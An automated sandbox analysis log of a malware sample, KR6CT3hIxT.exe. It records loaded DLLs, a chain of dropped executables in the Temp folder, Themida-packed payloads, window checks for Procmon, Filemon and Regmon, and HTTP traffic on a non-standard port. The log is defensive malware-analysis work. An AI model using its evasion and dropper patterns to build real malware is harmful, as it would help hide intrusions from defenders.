Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: ndfapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: wdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Section loaded: amsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: KR6CT3hIxT.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: KR6CT3hIxT.exe

Static file information: File size 7616416 > 1048576

Source: KR6CT3hIxT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: KR6CT3hIxT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: KR6CT3hIxT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: KR6CT3hIxT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: KR6CT3hIxT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: KR6CT3hIxT.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: KR6CT3hIxT.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: KR6CT3hIxT.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4.exe, 00000001.00000000.1688378562.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, 4.exe, 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmp, rdegje.exe, 00000006.00000002.1948042720.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe, 00000006.00000000.1938407320.0000000000F04000.00000002.00000001.01000000.0000000C.sdmp, rdegje.exe.2.dr, 4.exe.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb. source: winrar-x64-701.exe.0.dr
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: KR6CT3hIxT.exe
Source:	Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 3.exe, 00000002.00000002.4149852444.0000000000F20000.00000040.00000001.01000000.0000000A.sdmp, r.exe, 00000007.00000002.2159322752.0000000000E30000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar64\Release\sfxrar.pdb source: winrar-x64-701.exe.0.dr

Source: KR6CT3hIxT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KR6CT3hIxT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KR6CT3hIxT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KR6CT3hIxT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KR6CT3hIxT.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\3.exe	Unpacked PE file: 2.2.3.exe.f10000.0.unpack :ER;.rsrc:R;.reloc:R;.imports:W;.themida:EW;.boot:ER; vs :ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\r.exe	Unpacked PE file: 7.2.r.exe.e10000.0.unpack :ER;.rsrc:R;.reloc:R;.imports:W;.themida:EW;.boot:ER; vs :ER;.rsrc:R;

Source: r.exe.6.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .boot

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5080953

Jump to behavior

Source: KR6CT3hIxT.exe	Static PE information: section name: .didat
Source: KR6CT3hIxT.exe	Static PE information: section name: _RDATA
Source: 4.exe.0.dr	Static PE information: section name: .didat
Source: winrar-x64-701.exe.0.dr	Static PE information: section name: .didat
Source: winrar-x64-701.exe.0.dr	Static PE information: section name: _RDATA
Source: 3.exe.1.dr	Static PE information: section name:
Source: 3.exe.1.dr	Static PE information: section name: .imports
Source: 3.exe.1.dr	Static PE information: section name: .themida
Source: 3.exe.1.dr	Static PE information: section name: .boot
Source: rdegje.exe.2.dr	Static PE information: section name: .didat
Source: r.exe.6.dr	Static PE information: section name:
Source: r.exe.6.dr	Static PE information: section name: .imports
Source: r.exe.6.dr	Static PE information: section name: .themida
Source: r.exe.6.dr	Static PE information: section name: .boot

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DF5166 push rsi; retf	0_2_00007FF7E1DF5167
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Code function: 0_2_00007FF7E1DF5156 push rsi; retf	0_2_00007FF7E1DF5157
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B807F0 push ecx; ret	1_2_00B80803
Source: C:\Users\user\AppData\Local\Temp\4.exe	Code function: 1_2_00B7FEFC push eax; ret	1_2_00B7FF1A
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EF07F0 push ecx; ret	6_2_00EF0803
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	Code function: 6_2_00EEFEFC push eax; ret	6_2_00EEFF1A
Source: C:\Users\user\AppData\Local\Temp\r.exe	Code function: 7_2_06FDE5C0 push es; ret	7_2_06FDE5D0

Source: 3.exe.1.dr	Static PE information: section name: entropy: 7.961502728073197
Source: r.exe.6.dr	Static PE information: section name: entropy: 7.975061725537987

Source: C:\Users\user\AppData\Local\Temp\3.exe	File created: C:\Users\user\AppData\Local\Temp\rdegje.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	File created: C:\Users\user\AppData\Local\Temp\4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4.exe	File created: C:\Users\user\AppData\Local\Temp\3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\rdegje.exe	File created: C:\Users\user\AppData\Local\Temp\r.exe	Jump to dropped file
Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	File created: C:\Users\user\AppData\Local\Temp\winrar-x64-701.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r.exe	Window searched: window name: Regmonclass	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 54762
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 54762 -> 49740

Source: C:\Users\user\Desktop\KR6CT3hIxT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
